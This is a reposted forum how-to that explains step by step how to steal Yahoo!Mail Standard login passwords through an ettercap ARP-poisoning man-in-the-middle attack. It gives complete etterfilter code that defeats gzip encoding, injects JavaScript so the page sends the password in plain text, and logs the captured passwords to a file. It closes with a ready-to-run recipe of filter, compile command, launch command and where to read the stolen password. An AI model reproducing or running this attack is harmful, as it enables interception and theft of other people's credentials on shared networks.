HowTo do filters (Yahoo example)

http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833

http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter.html

Hello

I've been playing with filters for a little while, and I thought I'dshare some info, in the form of a HowTo. This FAQ applies to ettercapNG(0.7+) on linux. It may work on other *nix and *bsd (OS X?). Itprobably won't work on Windows at the time of writing.

Filters in ettercap are a way of affecting the network traffic,without having to spend ages coding stuff. You can search packets, dropthem, inject them, find+replace in them, and log them. You can alsoprint nice messages to the ettercap message window.

Okay, where do we start? What do we want to achieve? I've wanted tobreak the Yahoo!Mail Standard login for a while now; it just seemssilly that it isn't covered by SSL. My plan was to change thejavascript in the page so that the password is hashed (like it shouldbe) but is also logged in plain-text. If you know nothing aboutYahoo!Mail Standard login then please search the forums; I've posted ina handful of threads to explain how it works (including code listingsof the javascript).

First up, I used ethereal tomonitor the web traffic that I was interested in. By doing this Inoticed that the page was sent compressed with gzip and/or deflate.etterfilter really needs plain text, so first challenge was to changethe page into plain HTML and Javascript. I ran burpproxy (www.portswigger.net) to catch the request send by the client. As expected there was this line:

Code:Accept-Encoding: gzip, deflate

So, 'why not build a filter to zap those types of encoding?', Ithought. According to the etterfilter man page and the examples in/usr/local/share/ettercap, the following was required:

Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    "); # note: four spaces in the replacement string
      msg("whited out gzip/n");
   }
}

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "deflate")) {
      replace("deflate", "       "); # note: seven spaces in the replacement string
      msg("whited out deflate/n");
   }
}

The above two filters match against all tcp traffic going totcp/80. They then search the packets for the required string, and ifthere they will replace them with equal-length strings of spaces. Theywill also print out a short message to the message window to say whatthey have done.

I created a new file in /tmp, (/tmp/kevfilter) and put the above code snippet into it and saved it.
I then run:

Code:# cd /tmp
# etterfilter kevfilter

There weren't any errors. Etterfilter outputted filter.ef, which is the compiled filter that ettercap can use.

I ran ettercap, including the filter:

Code:# ettercap -Tq -M arp:remote -F filter.ef //

I monitored the traffic in ethereal and noticed that the Accept-Encoding line had changed to:

Code:Accept-Encoding:     ,       

which was cool, but not very neat.

I immediately recoded the filter like this:

Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!/n");
   }
}

By changing Accept-Encoding to Accept-Rubbish! the web server willsimply ignore the parameters (gzip, deflate, whatever) and fall-back toplain text - Yeehaa. I editted the file, saved it and reran it. Itworked.

Second, was to change thejavascript. By looking through the page source, I noticed that therewas a variable '.e' that was never used. In the hashing function(function hash, unsurprisingly ), the password entered into the form is stored in a var called passwd;this is then hashed with the challenge; and the url containing all theparameters is constructed (in GET form). I simply needed to add theplaintext passwd as a variable to the url. I noticed this bit:

Code:
url += "&.hash=1";
if(js == 0){
  url += "&.js=1";
}
url += "&.md5=1";
//alert("url=" + url);
location.href=url;

You see, parameters are added to the url by simply appending"&PARAM=VALUE" to the current url (using the += operator). The lastline prepares the url for sending, so I probably needed to get my stuffin before that line. That commented-out line looked like a suitabletarget. The javascript line I wanted to add was this:

Code:url += ".e="+passwd;

which is actually shorter than the commented-out line. I built thefilter by adding the following code to the same file as above:

Code:
if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "//alert(/x22url=/x22 + url);")) {
      replace("//alert(/x22url=/x22 + url);", "url +=/x22&.e=/x22+passwd; "); # note: replacement string is same lengthas original string
      msg("Sent the passwd in plain-text in '.e'./n");
   }
}

This filter operates on traffic with a sourceport of tcp/80, rather than a destination port of tcp/80. Note thatquotes (") have been replaced with '/x22', which is the hex of theascii for a quote.

I compiled the two filters with etterfilter (it needs to have theAccept-Encoding filter in there too) and ran ettercap with them. Ireloaded the yahoo page, noted in the message window that thesubstitution had taken place and then dumped the page source. In thehashing function, the commented-out line had been replaced with myhack. I logged into Yahoo (which was successful BTW) and then stoppedettercap. Looking in ethereal, I found my passwd in plain-text in theHTTP GET. Fantastic, but could've been a bit neater.

Lastly then, I added one morefilter to the file in order to log the packets that were likely tocontain the passwds. This filter looked like this:

Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, ".e=")) {
      msg("Packet logged/n");
      log(DATA.data, "/tmp/yahoopasswd.log");
   }
}

It matches on all packets with a destination of tcp/80 (send by theclient) and logs all packets that include ".e=". I reran the test withsimilar results, except this time I could look in the text file/tmp/yahoopasswd.log and see the entered passwd.

So, from the top, to recreate this, you need to do the following:
1) create a new file called /tmp/kevfilter and enter the following text:

Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!/n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "//alert(/x22url=/x22 + url);")) {
      replace("//alert(/x22url=/x22 + url);", "url +=/x22&.e=/x22+passwd; "); # note: replacement string is same lengthas original string
      msg("Sent the passwd in plain-text in '.e'./n");
   }
}

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, ".e=")) {
      msg("Packet logged/n");
      log(DATA.data, "/tmp/yahoopasswd.log");
   }
}

2) Compile this file with etterfilter:

Code:# cd /tmp
# etterfilter kevfilter

3) Run ettercap with this filter:

Code:# ettercap -Tq -M arp:remote -F filter.ef //

4) Reload the Yahoo!Mail login page and then login.
5) stop ettercap ('q') and look in /tmp/yahoopasswd.log for the password.

I'll be including most of this HowTo in a paper on Server-providedClient-side Scripting Modification Vulnerabilities. Hacking yahoologins is small-fry. Any web page using client-side javascript (or anyother client-side interpreted script) for security reasons is subjectto unauthorised modification and should be avoided or coded with thisin mind.

BTW Please remember that youcan only filter traffic on the wire; so ettercap will not filtertraffic generated by the host ettercap is running on. In short, youneed two machines to test this, one for ettercap and one for webbrowsing.

Kev